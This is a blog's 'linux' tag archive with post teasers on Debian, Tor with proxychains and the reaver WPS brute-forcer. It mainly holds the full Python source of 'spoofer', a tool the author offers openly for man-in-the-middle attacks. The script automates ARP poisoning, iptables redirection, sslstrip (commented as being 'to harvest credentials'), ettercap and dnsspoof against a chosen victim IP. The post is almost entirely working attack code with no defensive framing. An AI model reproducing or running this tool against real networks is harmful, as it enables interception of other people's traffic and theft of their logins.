Tag Archives for linux
Debian backports
Debian is my personal favourite Linux distribution. I have used it for many years. I have tried other flavours but I always end up back where I started. I like to run the most stable releases on my machines, currently … Continue reading
Staying anonymous with tor & proxychains
I am going to give you a quick demo on getting Tor installed along with proxychains to route network-based applications through the Tor network. This is aimed at Debian-based systems but the code can be used over any … Continue reading
Compiling reaver-wps
Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases. Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety … Continue reading
Spoofer – Automated arp / dns poisoning
I have knocked up a little menu-driven Python tool called spoofer. Spoofer takes the leg work out of getting a system set up for man-in-the-middle attacks. Here is the code:
#!/usr/bin/python
#
# Usage: ./spoofer.py {adapter} {slave-ip} {gateway-ip}
# eg: ./spoofer.py wlan0 10.0.0.10 10.0.0.1
#
# Requirements:
# Dsniff (arpspoof) - sslstrip - ettercap
#

from os import system, getuid
from sys import argv, exit
from time import sleep

class colours:
    bold = '\033[1m'
    red = '\033[31m'
    green = '\033[32m'
    reset = '\033[0;0m'

def arp_cleanup():
    # stop arpspoof
    print "\n[+] Stopping arpspoof"
    system('killall arpspoof')
    sleep(1)
    # set ip_forward to 0
    print "[+] Stopping IPv4 forwarding"
    system('echo 0 > /proc/sys/net/ipv4/ip_forward')
    sleep(1)
    # clear iptables rules
    print "[+] Flushing iptable rules"
    system("iptables -t nat -D PREROUTING -i %s -p tcp --dport 80 -j REDIRECT --to-port 10000" % adapter)
    sleep(1)
    # stop ssl strip
    print "[+] Stopping sslstrip\n"
    system('kill $(ps -ef | grep sslstrip | awk \'{print $2}\')')
    sleep(1)
    exit()

def dns_cleanup():
    raw_input('\n[+] Hit ENTER to exit')
    # stop dnsspoof
    print "\n[+] Stopping dnsspoof"
    system('killall dnsspoof')
    sleep(2)
    # stop arpspoof
    print "[+] Stopping arpspoof"
    system('killall arpspoof')
    sleep(3)
    # set ip_forward to 0
    print "[+] Stopping IPv4 forwarding\n"
    system('echo 0 > /proc/sys/net/ipv4/ip_forward')
    sleep(1)
    exit()

if getuid() != 0:
    print("You need to be root (sudo %s)" % argv[0])
else:
    if len(argv) < 2:
        system('clear')
        print("\nusage: %s adapter" % argv[0])
        print("\teg: %s eth0\n" % argv[0])
    else:
        # set some variables
        adapter = argv[1]
        spooftype = 0

        while spooftype != range(1,3):
            system('clear')
            spooftype = raw_input("\nSelect spoof type:\n\n[1] arp poison\n[2] dns spoof\n\nspoofer > ")

            # arp spoof attack
            if spooftype == "1":
                slave = raw_input("\nEnter slave IP: > ")
                gateway = raw_input("Enter gateway IP: > ")
                # set rules for traffic forwarding
                print "\n[+] Setting iptable rules"
                system("iptables -t nat -A PREROUTING -i %s -p tcp --dport 80 -j REDIRECT --to-port 10000" % adapter)
                sleep(2)
                # start arp poison on slave / gateway
                print "[+] Starting arpspoof"
                system('arpspoof -i %s -t %s %s > /dev/null 2>&1 &' % (adapter, slave, gateway))
                sleep(2)
                # start sslstrip to harvest credentials
                print "[+] Starting sslstrip"
                system('python /pentest/web/sslstrip/sslstrip.py -a -f -k > /dev/null 2>&1 &')
                sleep(2)
                # run ettercap against slave
                print "[+] Starting ettercap"
                system('xterm -e ettercap -T -q -i %s &' % adapter)
                sleep(2)
                # set ip forward mode
                system('echo 1 > /proc/sys/net/ipv4/ip_forward')
                sleep(1)
                print colours.bold + colours.red + "\n[+] Before exiting quit ettercap gracefully. (hit Q in the ettercap window)" + colours.reset
                raw_input('\n[+] Hit ENTER to exit')
                # clean up
                arp_cleanup()

            if spooftype == "2":
                slave = raw_input("\nEnter slave IP: > ")
                gateway = raw_input("Enter gateway IP: > ")
                # arp poison slave / gateway
                print colours.bold + colours.green + "\n[+] Poisoning..." + colours.reset
                system('arpspoof -i %s -t %s %s > /dev/null 2>&1 &' % (adapter, slave, gateway))
                sleep(2)
                # set ip forward mode
                system('echo 1 > /proc/sys/net/ipv4/ip_forward')
                sleep(1)
                # start dnsspoof
                system('dnsspoof -i %s -f /root/hosts.txt host %s and udp port 53 > /dev/null 2>&1 &' % (adapter, slave))
                # clean up
                dns_cleanup()
Spoofer relies on you having … Continue reading